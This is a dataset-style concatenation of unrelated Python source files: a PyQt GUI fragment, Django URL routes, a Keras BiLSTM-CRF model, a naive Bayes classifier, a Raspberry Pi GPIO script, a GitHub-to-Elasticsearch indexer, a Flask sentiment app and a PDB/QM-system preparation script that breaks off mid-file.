self.popWindow.setWindowOpacity(self.OpacitySlider.value() / 100)\n\n\n outPutView=QGraphicsView(self.popWindow)\n outPutView.resize(int(zoomscale*img_width),int(zoomscale*img_height))\n outPutView.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)\n outPutView.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)\n\n\n frame = QImage(img, img_width, img_height, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n picItem = QGraphicsPixmapItem(pix) # 创建像素图元\n picItem.setScale(zoomscale-0.1)\n picScene = QGraphicsScene() # 创建场景\n picScene.addItem(picItem)\n outPutView.setScene(picScene)\n outPutView.show()\n self.popWindow.open()\n\n\n def closeEvent(self, a0: QCloseEvent) -> None: #定义关闭按钮的方法\n\n if QMessageBox.question(self, '关闭', '是否退出程序', QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No) == QMessageBox.Yes:\n\n clean_dir(self.temp_dir)\n self.popWindow.destroy()\n self.destroy()\n a0.accept()\n sys.exit()\n\n else:\n a0.ignore()\n\n\napp = QApplication(sys.argv)\nwindow = App()\nwindow.show()\nsys.exit(app.exec_())\n","sub_path":"job/肺结节加图形界面/my_app.py","file_name":"my_app.py","file_ext":"py","file_size_in_byte":27262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"478573371","text":"# coding=utf-8 \n\"\"\"\n@author: mirrorChen\n@license: (C) Copyright 2011-2018, mirror personal Limited.\n@contact: chenjingxu3@dafycredit.com\n@software: JY_Android_AT\n@file: urls.py\n@time: 2019/10/15 15:08\n@desc: \n\"\"\"\n\nfrom django.urls import path\nfrom apps.base import views as baseView\n\n\nurlpatterns = [\n\n #手机信息\n path('pop_machineInfo/', baseView.pop_machineInfo),\n path('load_machineInfo/', baseView.load_machineInfo),\n path('machine_add', baseView.machine_add),\n path('machine_edit_get', baseView.machine_edit_get),\n path('machine_edit_save', baseView.machine_edit_save),\n path('machine_delete', baseView.machine_delete),\n #app信息\n path('load_appInfo/', baseView.load_appInfo),\n path('pop_appInfo/', baseView.pop_appInfo),\n path('add_appInfo/', baseView.add_appInfo),\n path('edit_appInfo_get/', baseView.edit_appInfo_get),\n path('edit_appInfo_save/', baseView.edit_appInfo_save),\n path('app_delete/', baseView.app_delete),\n #服务器信息\n path('load_serverInfo/', baseView.load_serverInfo),\n path('pop_serverInfo', baseView.pop_serverInfo),\n path('add_serverInfo/', baseView.add_serverInfo),\n path('edit_serverInfo_get/', baseView.edit_serverInfo_get),\n path('edit_serverInfo_save/', baseView.edit_serverInfo_save),\n path('server_delete/', baseView.server_delete),\n]","sub_path":"atp3/apps/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"568611449","text":"from keras.models import Model, Input\nfrom keras.layers import LSTM, Embedding, Dense, TimeDistributed, Dropout, Bidirectional\nimport keras as k\nfrom keras_contrib.layers import CRF\n\nclass CreatingModel():\n def creating_model(self,myobj,EMBEDDING,unit1,unit2):\n # Dimension of word embedding vector\n # Model definition\n #max_len_vector is max len sentence\n input = Input(shape=(myobj.max_len_vector,))\n\n X = Embedding(input_dim=myobj.n_words+2, output_dim=EMBEDDING, # n_words + 2 (PAD & UNK)\n input_length=myobj.max_len_vector, mask_zero=True)(input) # default: 20-dim embedding\n freport = open(\"logs/report.txt\", \"a\", encoding=\"utf8\")\n freport.write(\"embed.shape------\" + str(X.shape) + \"\\n\")\n print (\"shape of embedding: \"+str(X.shape))\n X = Bidirectional(LSTM(units=unit1, return_sequences=True,dropout=0.3,\n recurrent_dropout=0.3))(X)\n freport.write(\"layer1.shape-----\"+str((X.shape)) + \"\\n\")\n\n print(\"shape of layer1: \" + str(X.shape))\n \"\"\"X = Bidirectional(LSTM(units=unit2,return_sequences=True,dropout=0.3,\n recurrent_dropout=0.3))(X)\n print(\"shape of layer2: \" + str(X.shape))\n freport.write(\"layer2.shape-----\" + str((X.shape)) + \"\\n\")\"\"\"\n # variational biLSTM\n #x = add([layer1,layer2])\n\n #X=out\n X= TimeDistributed(Dense(myobj.n_tags+1, activation=\"softmax\"))(X) # a dense layer as suggested by neuralNer\n self.crf=CRF(myobj.n_tags+1)\n\n out = self.crf(X) # output\n self.model_ = Model(input, out)\n return self.model_, self.crf\n\n \"\"\"self.model_ = Model(input, X)\n return self.model_\n\"\"\"\n","sub_path":"Create_LSTM_model_5.py","file_name":"Create_LSTM_model_5.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"134508862","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nfrom scipy.stats import shapiro\nfrom collections import Counter\nimport statsmodels.api as sm\n\n# Reading data from file and convert to dataframe while replacing 9999 to NaN\ndef preprocess(filename):\n return pd.read_csv(filename, header = None).replace(9999, np.NaN)\n\n# Calculate prior probabilities and normal distribution of each attribute for each class\ndef train(data):\n model = []\n # Non-repeated class label list\n labels = sorted(list(set(data[data.columns[0]])))\n for label in labels:\n # Split to only take data from given class\n pose_data = data.loc[data[0] == label]\n pose_data = pose_data[pose_data.columns[1:]]\n mean_list = np.nanmean(pose_data, axis=0)\n std_list = np.nanstd(pose_data, axis=0)\n norm_list = []\n for i in range(len(mean_list)):\n norm_list.append(norm(mean_list[i], std_list[i]))\n prior = len(pose_data)/len(data)\n pose = [label, \n prior,\n norm_list]\n model.append(pose)\n return model\n\n# Predict labels of test set based on training model\ndef predict(test, model):\n predictions = []\n # drop labels from test set\n data = test[test.columns[1:]]\n for index, instance in data.iterrows():\n prediction = \"\"\n best_score = 0\n first = True\n # Calculate probabilities of each class\n for pose in model:\n # log prior probabilities\n score = np.log(pose[1])\n # sum up log of likelihood of features\n for i in range(len(instance)):\n # Ignore the missing features\n if np.isnan(instance.iloc[i]): \n continue\n else: \n score += pose[2][i].logpdf(instance.iloc[i])\n if first is True:\n best_score = score\n prediction = pose[0]\n first = False\n # Predict the highest socre class\n elif score > best_score:\n best_score = score\n prediction = pose[0]\n predictions.append(prediction)\n return predictions\n\n\n# Evaluateing the predictions\ndef evaluate(data, predictions, test):\n truth = test[test.columns[0]]\n labels = sorted(list(set(data[data.columns[0]])))\n count = Counter(list(test[test.columns[0]]))\n total = len(predictions)\n # initialize the error table\n error_table = {}\n for label in labels:\n # TP FN FP TN\n error_table[label] = [0,0,0,0]\n correct = 0\n for i in range(len(predictions)):\n if truth[i] == predictions[i]:\n # TP +1 for truth class and TN +1 for rest classes\n error_table[truth[i]][0] += 1\n for key, value in error_table.items():\n if key != truth[i]:\n error_table[key][3] += 1\n correct+=1\n else:\n # FN +1 for truth class and FP +1 for predicted class\n error_table[truth[i]][1] +=1\n error_table[predictions[i]][2] +=1\n accuracy = correct/total\n macro_p = 0\n macro_r = 0\n micro_p_n = 0\n micro_p_d = 0\n micro_r_n = 0\n micro_r_d = 0\n weight_p = 0\n weight_r = 0\n f_score = {}\n # Calculate performance measurements based on error table\n for label in labels:\n tp = error_table[label][0]\n fn = error_table[label][1]\n fp = error_table[label][2]\n tn = error_table[label][3]\n precision = tp/(tp+fp)\n recall = tp/(tp+fn)\n macro_p += precision\n macro_r += recall\n f_score[label] = 2*precision*recall /(precision+recall)\n micro_p_n += tp\n micro_p_d += tp+fp\n micro_r_n += tp\n micro_r_d += tp+fn\n weight_p += count[label]/total*precision\n weight_r += count[label]/total*recall\n # printing out the performance measurements results\n print(\"Overall Accuracy: \" + str(accuracy))\n macro_p = macro_p/len(labels)\n macro_r = macro_r/len(labels)\n macro_f = 2*macro_p*macro_r / (macro_p+macro_r)\n print(\"\\nMacro-averaging:\")\n print(\"Precision: \" + str(macro_p))\n print(\"Recall: \" + str(macro_r))\n print(\"F-score: \" + str(macro_f))\n micro_p = micro_p_n/micro_p_d\n micro_r = micro_r_n/micro_r_d\n micro_f = 2*micro_p*micro_r / (micro_p+micro_r)\n print(\"\\nMicro-averaging:\")\n print(\"Precision: \" + str(micro_p))\n print('Recall: ' + str(micro_r))\n print(\"F-score: \" + str(micro_f))\n weight_f = 2*weight_p*weight_r / (weight_p+weight_r)\n print(\"\\nWeighted averaging:\")\n print(\"Precision: \" + str(weight_p))\n print('Recall: ' + str(weight_r))\n print(\"F-score: \" + str(weight_f))\n x = []\n y = []\n # correspond count to f-score\n for label in labels:\n x.append(count[label])\n y.append(f_score[label])\n # printing out graph for question 1\n plt.title(\"F-score vs Count\")\n plt.xlabel(\"Count of class in test set\")\n plt.ylabel(\"F-socre of class\")\n plt.scatter(x,y)\n plt.show()\n return\n\n# Question 1\ndata = preprocess(\"train.csv\")\nmodel = train(data)\ntest = preprocess(\"test.csv\")\npredictions = predict(test, model)\nevaluate(data, predictions, test)\n\n# Question 2\nlabels = sorted(list(set(data[data.columns[0]])))\ncount = 0\nexample = True\nfor label in labels:\n # Split to only take data from given class\n pose_data = data.loc[data[0] == label]\n pose_data = pose_data[pose_data.columns[1:]]\n for index, content in pose_data.items():\n content = content.dropna()\n stat, p = shapiro(content)\n # Reject H0 at alpha = 0.05\n if(p < 0.05):\n # Showing first non-Gaussian distribution as example\n if example:\n if index >= 11:\n point = \"Y\" + str(index-10)\n else:\n point = \"X\" + str(index+1)\n print(\"For example: point \" + point + \" column of \"+ label + \" class has violated the Gaussian assumption with p-value of \" + str(p))\n plt.hist(content)\n plt.show()\n sm.qqplot(content, line ='s')\n plt.show()\n example = False\n count+=1\nprint(\"There have been \" + str(count) + \" out of \" + str(len(labels)*22) + \" attributes of classes that violated the Gaussian assumption\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45434665","text":"class layout_grid:\r\n def __init__(self, x=4,y=4):\r\n self.x = x\r\n self.y = y\r\n\r\n def set_dims(x,y):\r\n self.x = x\r\n self.y = y\r\n\r\n def perform_layout(self, ui_area):\r\n width = ui_area.r[2] // self.x\r\n height = ui_area.r[3] // self.y\r\n\r\n for i in range(0, len(ui_area.children)):\r\n x = (i % self.x) * width\r\n y = (i // self.y) * height\r\n child = ui_area.children[i]\r\n mutated_height = child.mutate_layout_height(height)\r\n child.r = [x,y,width,mutated_height]\r\n","sub_path":"client/ui/layout_grid.py","file_name":"layout_grid.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444060718","text":"\"\"\"\nA script for recording heating and cooling curves\n\n\"\"\"\n\nif __name__ == \"__main__\":\n from time import sleep\n #import datetime\n import pigpio\n #import DHT22\n #import pandas as pd\n from math import floor\n\n # Set pins\n heater_pin = 27\n humidifier_pin = 25\n\n pi = pigpio.pi()\n\n pi.set_mode(humidifier_pin, pigpio.OUTPUT)\n pi.set_mode(heater_pin, pigpio.OUTPUT)\n\n #initialize fan and heater off\n #pi.write(humidifier_pin, 0)\n #pi.write(heater_pin, 0)\n #HumidifierStatus = \"OFF\"\n #FanStatus = \"OFF\"\n\n\n\n if pi.read(humidifier_pin) == 0:\n pi.write(humidifier_pin, 1)\n HumidifierStatus = \"ON\"\n print(\"Humidifier is \" + HumidifierStatus)\n elif pi.read(humidifier_pin) == 1:\n pi.write(humidifier_pin, 0)\n HumidifierStatus = \"OFF\"\n print(\"Humidifier is \" + HumidifierStatus)\n else:\n print(\"error\")\n\n\n # if pi.read(humidifier_pin) == 0:\n # pi.write(humidifier_pin, 1)\n # HumidifierStatus = \"ON\"\n # print(\"Humidifier is \"+HumidifierStatus)\n # sleep(3)\n # for i in range(4):\n # if pi.read(humidifier_pin) == 0:\n # pi.write(humidifier_pin, 1)\n # HumidifierStatus = \"ON\"\n # print(\"Humidifier is \" + HumidifierStatus)\n # sleep(3)\n # elif pi.read(humidifier_pin) == 1:\n # pi.write(humidifier_pin, 0)\n # HumidifierStatus = \"OFF\"\n # print(\"Humidifier is \" + HumidifierStatus)\n # sleep(3)\n # else:\n # print(\"error\")\n\n #pi.write(heater_pin, 0)\n #pi.write(humidifier_pin, 0)\n # FanStatus = \"OFF\"\n\n #print(\"Fan is \"+FanStatus)\n\n pi.stop()","sub_path":"RaspberryPiVersion/tests/toggleHumidifier_pigpio.py","file_name":"toggleHumidifier_pigpio.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"607361726","text":"\"\"\"\nHarvests a GitHub org's repos and the associated repo tags and ingests this data\nin Elasticsearch.\n\nUsage:\n index.py [-h] [--workers WORKERS] github_org\n\"\"\"\n\n\nimport argparse\nimport datetime\nimport logging\nimport multiprocessing\nimport os\nimport sys\n\nfrom typing import Callable, Dict, Iterable, List\n\nfrom elasticsearch import Elasticsearch\nfrom github import Github, Repository\n\n\n# TODO better docstrings\n# TODO add tests\n# TODO add awareness of github api rate limiting\n# TODO add some error handling\n\n\nGITHUB_API_TOKEN = os.getenv(\"GITHUB_API_TOKEN\")\nGITHUB_ORG_ARGNAME = \"github_org\"\n\nNUM_WORKERS_ARGNAME = \"workers\"\nNUM_WORKERS_DEFAULT = 5\n\nES_ENDPOINT = os.getenv(\"ES_ENDPOINT\", \"http://localhost:9200\")\nES_INDEX = \"repos\"\nES_DOC_TYPE = \"repo\"\n\n\nlogging.basicConfig(\n stream=sys.stdout,\n level=logging.INFO,\n format=\"%(asctime)s %(levelname)s %(message)s\",\n)\n\n\ndef parse_args() -> argparse.Namespace:\n \"\"\"parse the command-line args\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n GITHUB_ORG_ARGNAME,\n type=str,\n nargs=1,\n help=\"the GitHub org whose repos will be indexed\",\n )\n parser.add_argument(\n f\"--{NUM_WORKERS_ARGNAME}\",\n type=int,\n default=NUM_WORKERS_DEFAULT,\n help=\"the number of workers to use\",\n )\n return parser.parse_args()\n\n\ndef get_tags(repo: Repository.Repository) -> Dict:\n \"\"\"get the tags for a github repo\"\"\"\n return {\"name\": repo.name, \"tags\": [x.name for x in repo.get_tags()]}\n\n\ndef do_work(values: Iterable, work_func: Callable, num_workers: int) -> List:\n \"\"\"helper for concurrent `map`ing\"\"\"\n logging.info(\"starting %d worker(s)\", num_workers)\n pool = multiprocessing.Pool(num_workers)\n result = pool.map(work_func, values)\n logging.info(\"finished fetching repo tags\")\n return result\n\n\ndef get_repos_and_tags(github_org: str, num_workers: int) -> List[Dict]:\n \"\"\"get all repos and associated tags for the github org\"\"\"\n gh = Github(GITHUB_API_TOKEN)\n org = gh.get_organization(github_org)\n\n logging.info(\"getting repos\")\n repos = list(org.get_repos())\n\n logging.info(\"getting tags\")\n repos_and_tags = do_work(repos, get_tags, num_workers)\n\n return repos_and_tags\n\n\ndef update_index(github_org: str, repos: List[Dict]) -> None:\n \"\"\"create/update repo docs in Elasticsearch\"\"\"\n es = Elasticsearch(ES_ENDPOINT)\n es.indices.create(index=ES_INDEX, ignore=400)\n\n logging.info(\"starting ES doc creation\")\n for repo in repos:\n doc = {\n \"org\": github_org,\n \"repo\": repo[\"name\"],\n \"tags\": repo[\"tags\"],\n \"timestamp\": \"T\".join(str(datetime.datetime.utcnow()).split()),\n }\n es.index(index=ES_INDEX, doc_type=ES_DOC_TYPE, id=repo[\"name\"], body=doc)\n logging.info(\"finished ES doc creation\")\n\n\ndef main() -> None:\n \"\"\"entrypoint\"\"\"\n args = parse_args()\n github_org = getattr(args, GITHUB_ORG_ARGNAME)[0]\n num_workers = getattr(args, NUM_WORKERS_ARGNAME)\n\n if not GITHUB_API_TOKEN:\n print(\"GITHUB_API_TOKEN environment variable not set\")\n return\n\n repos_and_tags = get_repos_and_tags(github_org, num_workers)\n update_index(github_org, repos_and_tags)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"397763140","text":"from flask import Flask, render_template\nimport os\nimport sys\nfrom flask import request\nfrom random import randint\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/find-emotion', methods=['POST'])\ndef result():\n \n content = request.form.get('content')\n \n flag, sentiment_meter = get_sentiment(content) \n \n result = {\n 'car_brand' : content,\n 'flag': flag,\n 'sentiment_meter' : sentiment_meter \n }\n \n #return content\n return render_template('result.html', result=result)\n\nsid = SentimentIntensityAnalyzer()\n\ndef get_sentiment(sentence):\n \n print(sentence)\n\n ss = sid.polarity_scores(sentence)\n \n #print(type(ss['pos']))\n\n positive_meter = round((ss['pos'] * 10), 2) \n negative_meter = round((ss['neg'] * 10), 2)\n\n '''\n for k in sorted(ss):\n #print(ss)\n print('{0}: {1}, '.format(k, ss[k]), end = '')\n '''\n\n print('positive : {0}, negative : {1}'.format(positive_meter, negative_meter))\n\n if(positive_meter > negative_meter):\n return True, positive_meter\n else:\n return False, negative_meter\n \nif __name__ == '__main__':\n host = os.environ.get('IP', '127.0.0.1')\n port = int(os.environ.get('PORT', 5000))\n \n app.run(host= host, port = port, use_reloader = False)\n \n \n'''\nSources:\n http://www.compjour.org/lessons/flask-single-page/multiple-dynamic-routes-in-flask/\n \n https://www.learnpython.org/en/String_Formatting\n \n https://stackoverflow.com/questions/25888396/how-to-get-latitude-longitude-with-python\n \n https://github.com/googlemaps/google-maps-services-python\n \n AIzaSyCRhRz_mw_5wIGgF-I6PUy3js6dcY6zQ6Q\n \n Get Current Location:\n https://stackoverflow.com/questions/44218836/python-flask-googlemaps-get-users-current-location-latitude-and-longitude\n'''","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81809481","text":"#!/usr/bin/env python3\n#######!/software/sse/easybuild/prefix/software/Anaconda3/5.3.0-extras-nsc1/bin-wrapped/python \n# -*- coding: utf-8 -*-\n\n# run with protonation: gen_syst1.py qm.tex pdb P\n# run without protonation: gen_syst1.py qm.tex pdb \n\n## program to automatise teh generation \n#of the syst1 file for quantum refinment\n\n\nimport time\n## set timer\ntime_start = time.time()\nimport sys\n##load mandatory modules\nimport numpy as np\n#import numpy as np\nprint(sys.argv)\nif len(sys.argv)>=2:\n qm=sys.argv[1]\n print(\"read from line 1\")\nelse:\n qm=\"qm.txt\"\n\n\nif len(sys.argv)>=3:\n input_pdb=sys.argv[2]\n print(\"read from line 2\")\nelse:\n input_pdb=\"comqum.pdb\"\n\nf_p=False\nif len(sys.argv)>=4:\n pq=sys.argv[3]\n print(pq)\n if pq == \"P\" or pq == \"p\":\n f_p=True\n print(\"protonation is on\")\n\n\n\n\ndef read_pdb(input_pdb):\n## reads in pdb coordinates hardcodedt\n##https://zhanglab.ccmb.med.umich.edu/BindProfX/pdb_atom_format.html\n##COLUMNS DATA TYPE CONTENTS\n##--------------------------------------------------------------------------------\n ##1 - 6 Record name \"ATOM \"\n## 7 - 11 Integer Atom serial number.\n##13 - 16 Atom Atom name.\n##17 Character Alternate location indicator.\n##18 - 20 Residue name Residue name.\n##22 Character Chain identifier.\n##23 - 26 Integer Residue sequence number.\n##27 AChar Code for insertion of residues.\n##31 - 38 Real(8.3) Orthogonal coordinates for X in Angstroms.\n##39 - 46 Real(8.3) Orthogonal coordinates for Y in Angstroms.\n##47 - 54 Real(8.3) Orthogonal coordinates for Z in Angstroms.\n##55 - 60 Real(6.2) Occupancy.\n##61 - 66 Real(6.2) Temperature factor (Default = 0.0).\n##73 - 76 LString(4) Segment identifier, left-justified.\n##77 - 78 LString(2) Element symbol, right-justified.\n##79 - 80 LString(2) Charge on the atom.\n print(\" read pdb file\")\n read_pdb = open(input_pdb, \"r\")\n org_pdb =[]\n work_pdb =[]\n f_head=False\n head=[]\n for line in read_pdb:\n idef = line[0:6].strip()\n if idef==\"ATOM\" or idef==\"HETATM\":\n f_head=True\n l_pdb=[]\n a = line[0:6].strip()\n a_num = int(line[6:11].strip())\n a_name = line[12:16].strip()\n alter = line[16].strip()\n res_name= line[17:20].strip()\n chain = line[21].strip()\n res_num = int(line[22:26].strip())\n inser = line[26].strip()\n x = float(line[30:38].strip())\n y = float(line[38:46].strip())\n z = float(line[46:54].strip())\n occ = float(line[54:60].strip())\n b_fac = float(line[60:66].strip())\n seg_i = line[72:76].strip()\n ele = line[76:78].strip()\n charge = line[78:80].strip()\n\n l_pdb.append(a)\n l_pdb.append(a_num)\n l_pdb.append(a_name)\n l_pdb.append(alter)\n l_pdb.append(res_name)\n l_pdb.append(chain)\n l_pdb.append(res_num)\n l_pdb.append(inser)\n l_pdb.append(x)\n l_pdb.append(y)\n l_pdb.append(z)\n l_pdb.append(occ)\n l_pdb.append(b_fac)\n l_pdb.append(seg_i)\n l_pdb.append(ele)\n l_pdb.append(charge)\n#[0, 1 , 2 , 3 , 4 , 5 , 6, , 7 , 8, 9,10\n#[a, a_num, a_name, alter, res_name, chain, res_num, inser, x, y, z\n#11 , 12 , 13 , 14 , 15\n#occ, b_fac, seg_i, ele, charge]\n org_pdb.append(l_pdb)\n work_pdb.append(l_pdb)\n# print(l_pdb)\n if f_head==False:\n head.append(line)\n print(\"close file:\", input_pdb)\n return org_pdb, work_pdb, head\n\n\ndef read_qm(qm):\n## read in atoms or resiodues for the qm system\n## inly actueal atoms trancuation ateoms are definem on it own\n## ATOM in PDB formart\n## RESI only one number\n## ANAM atom name with chain and residue\n## ANUM atom number\n print(\" read qm file\")\n read_qm_f = open(qm, \"r\")\n qm_atom = []\n qm_resi = []\n qm_anam = []\n qm_anum = []\n qm_rnum = []\n for line in read_qm_f:\n idef = line[0:6].strip()\n idef2= line.split()\n \n if idef==\"ATOM\" or idef==\"HETATM\":\n\n l_pdb=[]\n a = line[0:6]\n a_num = int(line[6:11].strip())\n a_name = line[12:16]\n alter = line[16]\n res_name= line[17:20]\n chain = line[21]\n res_num = int(line[22:26].strip())\n\n l_pdb.append(a)\n l_pdb.append(a_num)\n l_pdb.append(a_name)\n l_pdb.append(alter)\n l_pdb.append(res_name)\n l_pdb.append(chain)\n l_pdb.append(res_num)\n qm_atom.append(l_pdb)\n\n if len(idef2)>=1:\n if idef==\"RESI\" or idef2[0]==\"RESI\":\n s_line=line.split()\n l_resi=[]\n l_resi.append(s_line[1])\n l_resi.append(int(s_line[2]))\n qm_resi.append(l_resi)\n \n\n if idef==\"ANAM\" or idef2[0]==\"ANAM\":\n s_line=line.split()\n l_resi=[]\n l_resi.append(s_line[1])\n l_resi.append(int(s_line[2]))\n if len(s_line)<4:\n s_line.append(\" \")\n l_resi.append((s_line[3]))\n qm_anam.append(l_resi)\n\n if idef==\"ANUM\" or idef2[0]==\"ANUM\":\n s_line=line.split()\n l_resi=[]\n l_resi.append(int(s_line[1]))\n qm_anum.append(l_resi)\n\n if idef==\"RNUM\" or idef2[0]==\"RNUM\":\n s_line=line.split()\n l_resi=[]\n l_resi.append(int(s_line[1]))\n l_resi.append(int(s_line[2]))\n qm_rnum.append(l_resi)\n\n\n print(\"close file:\", qm)\n return qm_atom, qm_resi, qm_anam, qm_anum, qm_rnum\n\n\ndef assign_atm_nr(qm_atom, qm_resi, qm_anum, qm_anam, qm_rnum ,pdb):\n atm_nr=[]\n atm_qm=[]\n if len(qm_atom)>0:\n for i in range(len(qm_atom)):\n res_num= qm_atom[i][6]\n chain = qm_atom[i][5].strip()\n a_name = qm_atom[i][2].strip()\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n res_num_pdb = pdb[j][k][6]\n chain_pdb = pdb[j][k][5].strip()\n a_name_pdb = pdb[j][k][2].strip()\n if res_num == res_num_pdb and chain == chain_pdb and a_name == a_name_pdb:\n atm_nr.append(pdb[j][k][1])\n atm_qm.append(pdb[j][k])\n\n\n if len(qm_resi)>0:\n for i in range(len(qm_resi)):\n res_num= qm_resi[i][1]\n chain = qm_resi[i][0].strip()\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n res_num_pdb = pdb[j][k][6]\n chain_pdb = pdb[j][k][5].strip()\n# print(res_num, res_num_pdb)\n if res_num == res_num_pdb and chain == chain_pdb:\n# print(work_pdb[j][1])\n atm_nr.append(pdb[j][k][1])\n atm_qm.append(pdb[j][k])\n \n if len(qm_anum)>0:\n for i in range(len(qm_anum)):\n a_num=qm_anum[i][0]\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n a_num_pdb=pdb[j][k][1]\n if a_num == a_num_pdb:\n atm_nr.append(pdb[j][k][1])\n atm_qm.append(pdb[j][k])\n\n\n if len(qm_anam)>0:\n for i in range(len(qm_anam)):\n res_num= qm_anam[i][1]\n chain = qm_anam[i][2].strip()\n a_name = qm_anam[i][0].strip()\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n res_num_pdb = pdb[j][k][6]\n chain_pdb = pdb[j][k][5].strip()\n a_name_pdb = pdb[j][k][2].strip()\n if res_num == res_num_pdb and chain == chain_pdb and a_name == a_name_pdb:\n atm_nr.append(pdb[j][k][1])\n atm_qm.append(pdb[j][k])\n \n if len(qm_rnum)>0:\n for i in range(len(qm_rnum)):\n low = qm_rnum[i][0]\n up = qm_rnum[i][1]\n# print(low,up)\n for j in range(len(pdb)):\n a_num_pdb=pdb[j][k][1]\n # print(a_num_pdb, low,up)\n if low <= a_num_pdb <= up:\n atm_nr.append(pdb[j][k][1])\n atm_qm.append(pdb[j][k])\n\n\n\n atm_nr = list(set(atm_nr))\n atm_nr= sorted(atm_nr)\n atom_qm=[]\n# print(atm_nr)\n# print(atm_qm)\n for i in range(len(atm_nr)):\n for j in range(len(atm_qm)):\n# print(atm_qm[j])\n if atm_nr[i]== atm_qm[j][1]:\n atom_qm.append(atm_qm[j])\n break\n \n \n return atm_nr, atom_qm\ndef len3dvec(vec):\n## calculates lengh of a 3D vecor\n## input as list\n a = np.sqrt(vec[0]**2 + vec[1]**2 + vec[2]**2)\n return a\n\ndef find_truncation(atm_nr, atom_qm, pdb):\n## serche for trancuation atoms in radius aof 1.8 A around atoms\n trunc_nr = []\n trunc_atm= []\n print(atom_qm)\n for i in range(len(atom_qm)):\n vec1=[0,0,0]\n vec1[0] = atom_qm[i][8]\n vec1[1] = atom_qm[i][9]\n vec1[2] = atom_qm[i][10]\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n vec2=[0,0,0]\n vec2[0] = pdb[j][k][8]\n vec2[1] = pdb[j][k][9]\n vec2[2] = pdb[j][k][10]\n vec=[0,0,0]\n for h in range(len(vec)):\n vec[h]=vec1[h]-vec2[h]\n lenvec= len3dvec(vec)\n if 0.5 < lenvec <= 1.8:\n trunc_nr.append(pdb[j][k][1])\n trunc_atm.append(pdb[j][k])\n# print(\"trunc_nr\",trunc_nr)\n\n trunc_nr=sorted(list(set(trunc_nr)))\n# print(len(trunc_nr),\"trunc_nr2\",trunc_nr)\n# print(\"atm_nr\",atm_nr)\n trunc_nr = list(set(trunc_nr)-set(atm_nr))\n trunc_atom=[]\n# print(\"trunc_atm\",trunc_atm)\n# print(\"trunc_nr\",trunc_nr)\n for i in range(len(trunc_nr)):\n for j in range(len(trunc_atm)):\n if trunc_nr[i]==trunc_atm[j][1]:\n trunc_atom.append(trunc_atm[j])\n break\n return trunc_nr, trunc_atom\n\n\n\ndef sum_list(atm_nr, atom_qm, trunc_nr, trunc_atm):\n## define list of QM atom and truncation atoms\n f_trunc=[]\n f_all= atm_nr + trunc_nr\n for i in range(len(trunc_atm)):\n if trunc_atm[i][14].strip() != \"H\":\n f_trunc.append(trunc_atm[i][1])\n# if trunc_atm[i][2].strip() != \"H\":\n# f_trunc.append(trunc_atm[i][1])\n \n f_all = sorted(list(set(f_all)))\n f_trunc=sorted(list(set(f_trunc)))\n f_qm=list(set(f_all)-set(f_trunc))\n f_qm = sorted(list(set(f_qm)))\n\n return f_all, f_qm, f_trunc\n\n\ndef write_syst1(f_all,f_trunc):\n\n syst1=open(\"syst1\",\"w\")\n syst1.write(\"coment \\n\")\n f_comp=compress_list(f_all)\n for i in range(len(f_comp)):\n if len(f_comp[i])==1:\n string=str(f_comp[i][0])+\" \\n\"\n if len(f_comp[i])==2:\n string = str(f_comp[i][0])+\"-\"+str(f_comp[i][1])+\" \\n\"\n syst1.write(string)\n syst1.write(\" \\n\")\n for i in range(len(f_trunc)):\n string=str(f_trunc[i])+\" \\n\"\n syst1.write(string)\n syst1.write(\" \\n \\n \\n\")\n syst1.close()\n print(\"syst1 file is ready\")\n\ndef compress_list(list_in):\n list_out=[]\n# print(\"len(list_in)\",len(list_in))\n second = False\n for i in range(len(list_in)):\n# print(second, i, )\n\n if i == 0:\n pm = -1\n pp = list_in[i+1]-1\n p = list_in[i]\n if 0 < i < len(list_in)-1:\n pm = list_in[i-1]+1\n pp = list_in[i+1]-1\n p = list_in[i]\n if i == len(list_in)-1:\n pm = list_in[i-1]+1\n pp = -1\n p = list_in[i]\n\n\n# print(i, list_in[i],p,pm,pp, second)\n if second == False:\n if p != pm and p == pp:\n list_out.append([list_in[i]])\n second = True\n if p != pm and p != pp:\n list_out.append([list_in[i]])\n second = False\n continue\n if second == True :\n if p == pm and p == pp :\n# print(\"###############\")\n continue\n if p == pm and p != pp :\n# print(\"!!!!!!!!!!!\")\n list_out[len(list_out)-1].append(list_in[i])\n second = False\n if p != pm and p != pp :\n# print(\"¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\")\n list_out.append([list_in[i]])\n second = False\n\n# print(\"len(list_out)\",len(list_out))\n return 